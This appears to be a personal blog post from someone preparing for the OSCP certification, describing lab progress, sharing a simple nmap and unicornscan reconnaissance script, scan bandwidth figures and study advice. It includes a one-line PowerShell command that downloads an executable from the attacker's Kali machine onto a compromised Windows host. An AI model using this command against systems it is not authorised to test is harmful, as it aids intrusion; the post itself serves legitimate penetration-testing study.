OSCP Journey Part 9

Day: -44
PDF: 90%
Videos: 95%
Boxes: 7

So seven boxes down currently have low priv on the 8th – have spent approx 4 days getting low priv thanks to a sneak port choice. Took a break yesterday from the box to work on an initial scan script that would pick up something like that in future. I would have a lot more boxes completed if I could use metasploit! But I can’t rely on it in the exam so I’m not using it in the lab (other than mutli/handler and using the payloads listed in my previous post).

if [[ -z "$1" ]]; then
        echo "USAGE: ./scanner.sh [IP ADDRESS}"
        exit 1

echo ---------HAVE YOU BOUNCED THE BOX??----------------
nmap $ip -F -oN quick$ip

echo if this takes longer than 10 mins re run scan. Possibly restart box.
nmap $ip -p- -sT -oN tcpall$ip -T4 

unicornscan $ip:a > uniall$ip
echo EXTRACTING PORTS FROM quick$ip and tcpall$ip
cat quick$ip tcpall$ip | grep open | cut -d" " -f1 | sort -u
echo VIEWING uniall$ip
cat uniall$ip

Let me know if you use it/find it useful/suggest ways to improve it.

Even though the Nmap book says -sS scans are quicker, I’ve found this not to be the case, -sT scans have been quicker for me.

The script gives you a quick scan of the 100 most common ports and outputs that so you can begin working on a box, ie its found a web-server, while the -sT can is running go view the web page etc. The -sT scan run a -T4 has been the most reliable in testing, -T5 has missed ports and T3 (which is the normal scan when you run nmap) is a bit too slow – though very reliable. The unicorn scan is a quick check of the other 2 scans, as its always good to use a different tool to verify findings.

Now I’m sure there are ways to improve this script as its very basic but so far its been quite solid for me. The only thing I would say is that I couldn’t figure out how to grep the output of unicornscan.

Some interesting nmap scan stats about scans I’ve put together

ScanNetwork impact Against /24 
nmap –F $ip 0.005436MB 1.38MB 
nmap –top-ports 20 $ip0.014MB 3.57MB 
nmap –p- $ip2.971MB 757.60MB 
Nmap –A $ip2.399MB 611.74MB 
Nmap –p 139,443 –script=smb-vuln* $ip0.12MB 30.60MB 

So really think about what scan you want to run on a network because as you can see if scanning a whole range you will definitely affect the network with the load you are putting on.

My current struggle is Windows priv esc. I’ve used windows exploit suggester but every exploit I try doesn’t work. I’m obviously not doing something correctly, or the Offsec admins have manually patched the vulnerability its suggesting.

Nice script to put files on a windows machine with powershell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://kaliboxip/AFILE.exe','C:\Users\USERYOURLOGGEDINAS\Desktop\AFILE.exe')"

To those reading this who have not started or are thinking about it. Seriously take the time to explore hackthebox and vulnhub and really think about the tools your using and the exploits you’ve used. Refine your method, get very comfortable with nmap, especially the scripting engine. Learn to get stuck and fed up and want to give up – but keep at it until you pwn that box. Document what you have learned from the box – don’t think ‘its okay i’ll remember that’. You won’t – believe me. There as been quite a few times I’ve forgotten something and popped on to where I’ve documented it on this site as a reminder.

Lastly, I’ve booked the exam date….and accepted my fate of not passing on this attempt. I will eventually pass this exam I have set my mind to that, I don’t care how long it will take me. 

I hope this blog helps someone who has read other blogs and how they have pwned all the boxes in 2 days (exaggeration) and passed first time.



1 Response

  1. it is really helping me bro….please don’t stop publishing posts…and i really marking each pint you saying..especially the external resources (g0tmi1k , fuzzzy security, pentest.ws) and all commends too

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.